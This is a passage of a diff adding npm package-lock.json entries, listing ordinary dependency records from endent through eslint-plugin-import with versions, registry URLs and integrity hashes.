"https://registry.npmjs.org/endent/-/endent-2.1.0.tgz", + "integrity": "sha512-r8VyPX7XL8U01Xgnb1CjZ3XV+z90cXIJ9JPE/R9SEC9vpw2P6CfsRPJmp20DppC5N7ZAMCmjYkJIa744Iyg96w==", + "dev": true, + "license": "MIT", + "dependencies": { + "dedent": "^0.7.0", + "fast-json-parse": "^1.0.3", + "objectorarray": "^1.0.5" + } + }, + "node_modules/enhanced-resolve": { + "version": "5.17.1", + "resolved": "https://registry.npmjs.org/enhanced-resolve/-/enhanced-resolve-5.17.1.tgz", + "integrity": "sha512-LMHl3dXhTcfv8gM4kEzIUeTQ+7fpdA0l2tUf34BddXPkz2A5xJ5L/Pchd5BL6rdccM9QGvu0sWZzK1Z1t4wwyg==", + "dev": true, + "dependencies": { + "graceful-fs": "^4.2.4", + "tapable": "^2.2.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/enquirer": { + "version": "2.3.6", + "resolved": "https://registry.npmjs.org/enquirer/-/enquirer-2.3.6.tgz", + "integrity": "sha512-yjNnPr315/FjS4zIsUxYguYUPP2e1NK4d7E7ZOLiyYCcbFBiTMyID+2wvm2w6+pZ/odMA7cRkjhsPbltwBOrLg==", + "dev": true, + "dependencies": { + "ansi-colors": "^4.1.1" + }, + "engines": { + "node": ">=8.6" + } + }, + "node_modules/ensure-type": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/ensure-type/-/ensure-type-1.5.1.tgz", + "integrity": "sha512-Dxe+mVF4MupV6eueWiFa6hUd9OL9lIM2/LqR40k1P+dwG+G2il2UigXTU9aQlaw+Y/N0BKSaTofNw73htTbC5g==", + "dev": true + }, + "node_modules/ent": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/ent/-/ent-2.2.0.tgz", + "integrity": "sha1-6WQhkyWiHQX0RGai9obtbOX13R0=" + }, + "node_modules/entities": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-2.2.0.tgz", + "integrity": "sha512-p92if5Nz619I0w+akJrLZH0MX0Pb5DX39XOwQTtXSdQQOaYH03S1uIQp4mhOZtAXrxq4ViO67YTiLBo2638o9A==", + "dev": true, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "node_modules/env-paths": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/env-paths/-/env-paths-2.2.1.tgz", + "integrity": "sha512-+h1lkLKhZMTYjog1VEpJNG7NZJWcuc2DDk/qsqSTRRCOXiLjeQ1d1/udrUGhqMxUgAlwKNZ0cf2uqan5GLuS2A==", + "dev": true, + "peer": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/envify": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/envify/-/envify-4.1.0.tgz", + "integrity": "sha512-IKRVVoAYr4pIx4yIWNsz9mOsboxlNXiu7TNBnem/K/uTHdkyzXWDzHCK7UTolqBbgaBz0tQHsD3YNls0uIIjiw==", + "dev": true, + "dependencies": { + "esprima": "^4.0.0", + "through": "~2.3.4" + }, + "bin": { + "envify": "bin/envify" + } + }, + "node_modules/envinfo": { + "version": "7.8.1", + "resolved": "https://registry.npmjs.org/envinfo/-/envinfo-7.8.1.tgz", + "integrity": "sha512-/o+BXHmB7ocbHEAs6F2EnG0ogybVVUdkRunTT2glZU9XAaGmhqskrvKwqXuDfNjEO0LZKWdejEEpnq8aM0tOaw==", + "dev": true, + "bin": { + "envinfo": "dist/cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eol": { + "version": "0.9.1", + "resolved": "https://registry.npmjs.org/eol/-/eol-0.9.1.tgz", + "integrity": "sha512-Ds/TEoZjwggRoz/Q2O7SE3i4Jm66mqTDfmdHdq/7DKVk3bro9Q8h6WdXKdPqFLMoqxrDK5SVRzHVPOS6uuGtrg==", + "dev": true + }, + "node_modules/errno": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/errno/-/errno-0.1.8.tgz", + "integrity": "sha512-dJ6oBr5SQ1VSd9qkk7ByRgb/1SH4JZjCHSW/mr63/QcXO9zLVxvJ6Oy13nio03rxpSnVDDjFor75SjVeZWPW/A==", + "dev": true, + "optional": true, + "dependencies": { + "prr": "~1.0.1" + }, + "bin": { + "errno": "cli.js" + } + }, + "node_modules/error": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/error/-/error-7.0.2.tgz", + "integrity": "sha512-UtVv4l5MhijsYUxPJo4390gzfZvAnTHreNnDjnTZaKIiZ/SemXxAhBkYSKtWa5RtBXbLP8tMgn/n0RUa/H7jXw==", + "dependencies": { + "string-template": "~0.2.1", + "xtend": "~4.0.0" + } + }, + "node_modules/error-ex": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", + "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", + "dev": true, + "dependencies": { + "is-arrayish": "^0.2.1" + } + }, + "node_modules/error-stack-parser": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/error-stack-parser/-/error-stack-parser-2.1.4.tgz", + "integrity": "sha512-Sk5V6wVazPhq5MhpO+AUxJn5x7XSXGl1R93Vn7i+zS15KDVxQijejNCrz8340/2bgLBjR9GtEG8ZVKONDjcqGQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "stackframe": "^1.3.4" + } + }, + "node_modules/es-abstract": { + "version": "1.23.3", + "resolved": "https://registry.npmjs.org/es-abstract/-/es-abstract-1.23.3.tgz", + "integrity": "sha512-e+HfNH61Bj1X9/jLc5v1owaLYuHdeHHSQlkhCBiTK8rBvKaULl/beGMxwrMXjpYrv4pz22BlY570vVePA2ho4A==", + "license": "MIT", + "dependencies": { + "array-buffer-byte-length": "^1.0.1", + "arraybuffer.prototype.slice": "^1.0.3", + "available-typed-arrays": "^1.0.7", + "call-bind": "^1.0.7", + "data-view-buffer": "^1.0.1", + "data-view-byte-length": "^1.0.1", + "data-view-byte-offset": "^1.0.0", + "es-define-property": "^1.0.0", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.0.0", + "es-set-tostringtag": "^2.0.3", + "es-to-primitive": "^1.2.1", + "function.prototype.name": "^1.1.6", + "get-intrinsic": "^1.2.4", + "get-symbol-description": "^1.0.2", + "globalthis": "^1.0.3", + "gopd": "^1.0.1", + "has-property-descriptors": "^1.0.2", + "has-proto": "^1.0.3", + "has-symbols": "^1.0.3", + "hasown": "^2.0.2", + "internal-slot": "^1.0.7", + "is-array-buffer": "^3.0.4", + "is-callable": "^1.2.7", + "is-data-view": "^1.0.1", + "is-negative-zero": "^2.0.3", + "is-regex": "^1.1.4", + "is-shared-array-buffer": "^1.0.3", + "is-string": "^1.0.7", + "is-typed-array": "^1.1.13", + "is-weakref": "^1.0.2", + "object-inspect": "^1.13.1", + "object-keys": "^1.1.1", + "object.assign": "^4.1.5", + "regexp.prototype.flags": "^1.5.2", + "safe-array-concat": "^1.1.2", + "safe-regex-test": "^1.0.3", + "string.prototype.trim": "^1.2.9", + "string.prototype.trimend": "^1.0.8", + "string.prototype.trimstart": "^1.0.8", + "typed-array-buffer": "^1.0.2", + "typed-array-byte-length": "^1.0.1", + "typed-array-byte-offset": "^1.0.2", + "typed-array-length": "^1.0.6", + "unbox-primitive": "^1.0.2", + "which-typed-array": "^1.1.15" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/es-define-property": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.0.tgz", + "integrity": "sha512-jxayLKShrEqqzJ0eumQbVhTYQM27CfT1T35+gCgDFoL82JLsXqTJ76zv6A0YLOgEnLUMvLzsDsGIrl8NFpT2gQ==", + "dependencies": { + "get-intrinsic": "^1.2.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-get-iterator": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/es-get-iterator/-/es-get-iterator-1.1.3.tgz", + "integrity": "sha512-sPZmqHBe6JIiTfN5q2pEi//TwxmAFHwj/XEuYjTuse78i8KxaqMTTzxPoFKuzRpDpTJ+0NAbpfenkmH2rePtuw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.1.3", + "has-symbols": "^1.0.3", + "is-arguments": "^1.1.1", + "is-map": "^2.0.2", + "is-set": "^2.0.2", + "is-string": "^1.0.7", + "isarray": "^2.0.5", + "stop-iteration-iterator": "^1.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/es-module-lexer": { + "version": "1.5.4", + "resolved": "https://registry.npmjs.org/es-module-lexer/-/es-module-lexer-1.5.4.tgz", + "integrity": "sha512-MVNK56NiMrOwitFB7cqDwq0CQutbw+0BvLshJSse0MUNU+y1FC3bUS/AQg7oUng+/wKrrki7JfmwtVHkVfPLlw==", + "dev": true, + "license": "MIT" + }, + "node_modules/es-object-atoms": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.0.0.tgz", + "integrity": "sha512-MZ4iQ6JwHOBQjahnjwaC1ZtIBH+2ohjamzAO3oaHcXYup7qxjF2fixyH+Q71voWHeOkI2q/TnJao/KfXYIZWbw==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-set-tostringtag": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.0.3.tgz", + "integrity": "sha512-3T8uNMC3OQTHkFUsFq8r/BwAXLHvU/9O9mE0fBc/MY5iq/8H7ncvO947LmYA6ldWw9Uh8Yhf25zu6n7nML5QWQ==", + "license": "MIT", + "dependencies": { + "get-intrinsic": "^1.2.4", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-shim-unscopables": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/es-shim-unscopables/-/es-shim-unscopables-1.0.0.tgz", + "integrity": "sha512-Jm6GPcCdC30eMLbZ2x8z2WuRwAws3zTBBKuusffYVUrNj/GVSUAZ+xKMaUpfNDR5IbyNA5LJbaecoUVbmUcB1w==", + "dev": true, + "dependencies": { + "has": "^1.0.3" + } + }, + "node_modules/es-to-primitive": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/es-to-primitive/-/es-to-primitive-1.2.1.tgz", + "integrity": "sha512-QCOllgZJtaUo9miYBcLChTUaHNjJF3PYs1VidD7AwiEj1kYxKeQTctLAezAOH5ZKRH0g2IgPn6KwB4IT8iRpvA==", + "dependencies": { + "is-callable": "^1.1.4", + "is-date-object": "^1.0.1", + "is-symbol": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/es-toolkit": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/es-toolkit/-/es-toolkit-1.32.0.tgz", + "integrity": "sha512-ZfSfHP1l6ubgW/B/FRtqb9bYdMvI6jizbOSfbwwJNcOQ1QE6TFsC3jpQkZ900uUPSR3t3SU5Ds7UWKnYz+uP8Q==", + "dev": true, + "license": "MIT", + "workspaces": [ + "docs", + "benchmarks" + ] + }, + "node_modules/es5-ext": { + "version": "0.10.64", + "resolved": "https://registry.npmjs.org/es5-ext/-/es5-ext-0.10.64.tgz", + "integrity": "sha512-p2snDhiLaXe6dahss1LddxqEm+SkuDvV8dnIQG0MWjyHpcMNfXKPE+/Cc0y+PhxJX3A4xGNeFCj5oc0BUh6deg==", + "hasInstallScript": true, + "dependencies": { + "es6-iterator": "^2.0.3", + "es6-symbol": "^3.1.3", + "esniff": "^2.0.1", + "next-tick": "^1.1.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/es6-iterator": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/es6-iterator/-/es6-iterator-2.0.3.tgz", + "integrity": "sha1-p96IkUGgWpSwhUQDstCg+/qY87c=", + "dependencies": { + "d": "1", + "es5-ext": "^0.10.35", + "es6-symbol": "^3.1.1" + } + }, + "node_modules/es6-promise": { + "version": "4.2.8", + "resolved": "https://registry.npmjs.org/es6-promise/-/es6-promise-4.2.8.tgz", + "integrity": "sha512-HJDGx5daxeIvxdBxvG2cb9g4tEvwIk3i8+nhX0yGrYmZUzbkdg8QbDevheDB8gd0//uPj4c1EQua8Q+MViT0/w==" + }, + "node_modules/es6-symbol": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/es6-symbol/-/es6-symbol-3.1.3.tgz", + "integrity": "sha512-NJ6Yn3FuDinBaBRWl/q5X/s4koRHBrgKAu+yGI6JCBeiu3qrcbJhwT2GeR/EXVfylRk8dpQVJoLEFhK+Mu31NA==", + "dependencies": { + "d": "^1.0.1", + "ext": "^1.1.2" + } + }, + "node_modules/es6-weak-map": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/es6-weak-map/-/es6-weak-map-2.0.3.tgz", + "integrity": "sha512-p5um32HOTO1kP+w7PRnB+5lQ43Z6muuMuIMffvDN8ZB4GcnjLBV6zGStpbASIMk4DCAvEaamhe2zhyCb/QXXsA==", + "dev": true, + "dependencies": { + "d": "1", + "es5-ext": "^0.10.46", + "es6-iterator": "^2.0.3", + "es6-symbol": "^3.1.1" + } + }, + "node_modules/esbuild": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.0.tgz", + "integrity": "sha512-BXq5mqc8ltbaN34cDqWuYKyNhX8D/Z0J1xdtdQ8UcIIIyJyz+ZMKUt58tF3SrZ85jcfN/PZYhjR5uDQAYNVbuw==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=18" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.25.0", + "@esbuild/android-arm": "0.25.0", + "@esbuild/android-arm64": "0.25.0", + "@esbuild/android-x64": "0.25.0", + "@esbuild/darwin-arm64": "0.25.0", + "@esbuild/darwin-x64": "0.25.0", + "@esbuild/freebsd-arm64": "0.25.0", + "@esbuild/freebsd-x64": "0.25.0", + "@esbuild/linux-arm": "0.25.0", + "@esbuild/linux-arm64": "0.25.0", + "@esbuild/linux-ia32": "0.25.0", + "@esbuild/linux-loong64": "0.25.0", + "@esbuild/linux-mips64el": "0.25.0", + "@esbuild/linux-ppc64": "0.25.0", + "@esbuild/linux-riscv64": "0.25.0", + "@esbuild/linux-s390x": "0.25.0", + "@esbuild/linux-x64": "0.25.0", + "@esbuild/netbsd-arm64": "0.25.0", + "@esbuild/netbsd-x64": "0.25.0", + "@esbuild/openbsd-arm64": "0.25.0", + "@esbuild/openbsd-x64": "0.25.0", + "@esbuild/sunos-x64": "0.25.0", + "@esbuild/win32-arm64": "0.25.0", + "@esbuild/win32-ia32": "0.25.0", + "@esbuild/win32-x64": "0.25.0" + } + }, + "node_modules/esbuild-register": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/esbuild-register/-/esbuild-register-3.6.0.tgz", + "integrity": "sha512-H2/S7Pm8a9CL1uhp9OvjwrBh5Pvx0H8qVOxNu8Wed9Y7qv56MPtq+GGM8RJpq6glYJn9Wspr8uw7l55uyinNeg==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^4.3.4" + }, + "peerDependencies": { + "esbuild": ">=0.12 <1" + } + }, + "node_modules/esbuild-register/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/escalade": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.2.tgz", + "integrity": "sha512-ErCHMCae19vR8vQGe50xIsVomy19rg6gFu3+r3jkEO46suLMWBksvVyoGgQV+jOfl84ZSOSlmv6Gxa89PmTGmA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/escape-html": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz", + "integrity": "sha1-Aljq5NPQwJdN4cFpGI7wBR0dGYg=" + }, + "node_modules/escape-string-regexp": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", + "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/escodegen": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-2.1.0.tgz", + "integrity": "sha512-2NlIDTwUWJN0mRPQOdtQBzbUHvdGY2P1VXSyU83Q3xKxM7WHX2Ql8dKq782Q9TgQUNOLEzEYu9bzLNj1q88I5w==", + "dev": true, + "dependencies": { + "esprima": "^4.0.1", + "estraverse": "^5.2.0", + "esutils": "^2.0.2" + }, + "bin": { + "escodegen": "bin/escodegen.js", + "esgenerate": "bin/esgenerate.js" + }, + "engines": { + "node": ">=6.0" + }, + "optionalDependencies": { + "source-map": "~0.6.1" + } + }, + "node_modules/eslint": { + "version": "8.57.0", + "resolved": "https://registry.npmjs.org/eslint/-/eslint-8.57.0.tgz", + "integrity": "sha512-dZ6+mexnaTIbSBZWgou51U6OmzIhYM2VcNdtiTtI7qPNZm35Akpr0f6vtw3w1Kmn5PYo+tZVfh13WrhpS6oLqQ==", + "dependencies": { + "@eslint-community/eslint-utils": "^4.2.0", + "@eslint-community/regexpp": "^4.6.1", + "@eslint/eslintrc": "^2.1.4", + "@eslint/js": "8.57.0", + "@humanwhocodes/config-array": "^0.11.14", + "@humanwhocodes/module-importer": "^1.0.1", + "@nodelib/fs.walk": "^1.2.8", + "@ungap/structured-clone": "^1.2.0", + "ajv": "^6.12.4", + "chalk": "^4.0.0", + "cross-spawn": "^7.0.2", + "debug": "^4.3.2", + "doctrine": "^3.0.0", + "escape-string-regexp": "^4.0.0", + "eslint-scope": "^7.2.2", + "eslint-visitor-keys": "^3.4.3", + "espree": "^9.6.1", + "esquery": "^1.4.2", + "esutils": "^2.0.2", + "fast-deep-equal": "^3.1.3", + "file-entry-cache": "^6.0.1", + "find-up": "^5.0.0", + "glob-parent": "^6.0.2", + "globals": "^13.19.0", + "graphemer": "^1.4.0", + "ignore": "^5.2.0", + "imurmurhash": "^0.1.4", + "is-glob": "^4.0.0", + "is-path-inside": "^3.0.3", + "js-yaml": "^4.1.0", + "json-stable-stringify-without-jsonify": "^1.0.1", + "levn": "^0.4.1", + "lodash.merge": "^4.6.2", + "minimatch": "^3.1.2", + "natural-compare": "^1.4.0", + "optionator": "^0.9.3", + "strip-ansi": "^6.0.1", + "text-table": "^0.2.0" + }, + "bin": { + "eslint": "bin/eslint.js" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint-config-prettier": { + "version": "8.5.0", + "resolved": "https://registry.npmjs.org/eslint-config-prettier/-/eslint-config-prettier-8.5.0.tgz", + "integrity": "sha512-obmWKLUNCnhtQRKc+tmnYuQl0pFU1ibYJQ5BGhTVB08bHe9wC8qUeG7c08dj9XX+AuPj1YSGSQIHl1pnDHZR0Q==", + "dev": true, + "bin": { + "eslint-config-prettier": "bin/cli.js" + }, + "peerDependencies": { + "eslint": ">=7.0.0" + } + }, + "node_modules/eslint-config-standard": { + "version": "17.0.0", + "resolved": "https://registry.npmjs.org/eslint-config-standard/-/eslint-config-standard-17.0.0.tgz", + "integrity": "sha512-/2ks1GKyqSOkH7JFvXJicu0iMpoojkwB+f5Du/1SC0PtBL+s8v30k9njRZ21pm2drKYm2342jFnGWzttxPmZVg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "peerDependencies": { + "eslint": "^8.0.1", + "eslint-plugin-import": "^2.25.2", + "eslint-plugin-n": "^15.0.0", + "eslint-plugin-promise": "^6.0.0" + } + }, + "node_modules/eslint-config-standard-jsx": { + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/eslint-config-standard-jsx/-/eslint-config-standard-jsx-11.0.0.tgz", + "integrity": "sha512-+1EV/R0JxEK1L0NGolAr8Iktm3Rgotx3BKwgaX+eAuSX8D952LULKtjgZD3F+e6SvibONnhLwoTi9DPxN5LvvQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "peerDependencies": { + "eslint": "^8.8.0", + "eslint-plugin-react": "^7.28.0" + } + }, + "node_modules/eslint-import-resolver-node": { + "version": "0.3.6", + "resolved": "https://registry.npmjs.org/eslint-import-resolver-node/-/eslint-import-resolver-node-0.3.6.tgz", + "integrity": "sha512-0En0w03NRVMn9Uiyn8YRPDKvWjxCWkslUEhGNTdGx15RvPJYQ+lbOlqrlNI2vEAs4pDYK4f/HN2TbDmk5TP0iw==", + "dev": true, + "dependencies": { + "debug": "^3.2.7", + "resolve": "^1.20.0" + } + }, + "node_modules/eslint-import-resolver-node/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/eslint-module-utils": { + "version": "2.7.3", + "resolved": "https://registry.npmjs.org/eslint-module-utils/-/eslint-module-utils-2.7.3.tgz", + "integrity": "sha512-088JEC7O3lDZM9xGe0RerkOMd0EjFl+Yvd1jPWIkMT5u3H9+HC34mWWPnqPrN13gieT9pBOO+Qt07Nb/6TresQ==", + "dev": true, + "dependencies": { + "debug": "^3.2.7", + "find-up": "^2.1.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/eslint-module-utils/node_modules/find-up": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-2.1.0.tgz", + "integrity": "sha1-RdG35QbHF93UgndaK3eSCjwMV6c=", + "dev": true, + "dependencies": { + "locate-path": "^2.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/locate-path": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-2.0.0.tgz", + "integrity": "sha1-K1aLJl7slExtnA3pw9u7ygNUzY4=", + "dev": true, + "dependencies": { + "p-locate": "^2.0.0", + "path-exists": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/p-limit": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-1.3.0.tgz", + "integrity": "sha512-vvcXsLAJ9Dr5rQOPk7toZQZJApBl2K4J6dANSsEuh6QI41JYcsS/qhTGa9ErIUUgK3WNQoJYvylxvjqmiqEA9Q==", + "dev": true, + "dependencies": { + "p-try": "^1.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/p-locate": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-2.0.0.tgz", + "integrity": "sha1-IKAQOyIqcMj9OcwuWAaA893l7EM=", + "dev": true, + "dependencies": { + "p-limit": "^1.1.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/p-try": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/p-try/-/p-try-1.0.0.tgz", + "integrity": "sha1-y8ec26+P1CKOE/Yh8rGiN8GyB7M=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/path-exists": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-3.0.0.tgz", + "integrity": "sha1-zg6+ql94yxiSXqfYENe1mwEP1RU=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-plugin-chai-expect": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-chai-expect/-/eslint-plugin-chai-expect-3.0.0.tgz", + "integrity": "sha512-NS0YBcToJl+BRKBSMCwRs/oHJIX67fG5Gvb4tGked+9Wnd1/PzKijd82B2QVKcSSOwRe+pp4RAJ2AULeck4eQw==", + "dev": true, + "engines": { + "node": "10.* || 12.* || >= 14.*" + }, + "peerDependencies": { + "eslint": ">=2.0.0 <= 8.x" + } + }, + "node_modules/eslint-plugin-chai-friendly": { + "version": "0.7.2", + "resolved": "https://registry.npmjs.org/eslint-plugin-chai-friendly/-/eslint-plugin-chai-friendly-0.7.2.tgz", + "integrity": "sha512-LOIfGx5sZZ5FwM1shr2GlYAWV9Omdi+1/3byuVagvQNoGUuU0iHhp7AfjA1uR+4dJ4Isfb4+FwBJgQajIw9iAg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + }, + "peerDependencies": { + "eslint": ">=3.0.0" + } + }, + "node_modules/eslint-plugin-cypress": { + "version": "2.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-cypress/-/eslint-plugin-cypress-2.15.1.tgz", + "integrity": "sha512-eLHLWP5Q+I4j2AWepYq0PgFEei9/s5LvjuSqWrxurkg1YZ8ltxdvMNmdSf0drnsNo57CTgYY/NIHHLRSWejR7w==", + "dev": true, + "dependencies": { + "globals": "^13.20.0" + }, + "peerDependencies": { + "eslint": ">= 3.2.1" + } + }, + "node_modules/eslint-plugin-cypress/node_modules/globals": { + "version": "13.23.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.23.0.tgz", + "integrity": "sha512-XAmF0RjlrjY23MA51q3HltdlGxUpXPvg0GioKiD9X6HD28iMjo2dKC8Vqwm7lne4GNr78+RHTfliktR6ZH09wA==", + "dev": true, + "dependencies": { + "type-fest": "^0.20.2" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint-plugin-es": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-es/-/eslint-plugin-es-4.1.0.tgz", + "integrity": "sha512-GILhQTnjYE2WorX5Jyi5i4dz5ALWxBIdQECVQavL6s7cI76IZTDWleTHkxz/QT3kvcs2QlGHvKLYsSlPOlPXnQ==", + "dev": true, + "peer": true, + "dependencies": { + "eslint-utils": "^2.0.0", + "regexpp": "^3.0.0" + }, + "engines": { + "node": ">=8.10.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=4.19.1" + } + }, + "node_modules/eslint-plugin-import": { + "version": "2.26.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-import/-/eslint-plugin-import-2.26.0.tgz", + "integrity": "sha512-hYfi3FXaM8WPLf4S1cikh/r4IxnO6zrhZbEGz2b660EJRbuxgpDS5gkCuYgGWg2xxh2rBuIr4Pvhve/7c31koA==", + "dev": true, + "dependencies": { + "array-includes": "^3.1.4", + "array.prototype.flat": "^1.2.5", + "debug": "^2.6.9", + "doctrine": "^2.1.0", + "eslint-import-resolver-node": "^0.3.6", + "eslint-module-utils": "^2.7.3", + "has": "^1.0.3", + "is-core-module": "^2.8.1", + "is-glob": "^4.0.3", + "minimatch": "^3.1.2", + "object.values": "^1.1.5", + "resolve": "^1.22.0", + "tsconfig-paths": "^3.14.1" + }, + "engines": { + "node": ">=4" + }, + "peerDependencies": { + "eslint": "^2 || ^3 || ^4 || ^5 || ^6 || ^7.2.0 || ^8" + } + }, + "node_modules/eslint-plugin-import/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/eslint-plugin-import/node_modules/doctrine": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-2.1.0.tgz", + "integrity": 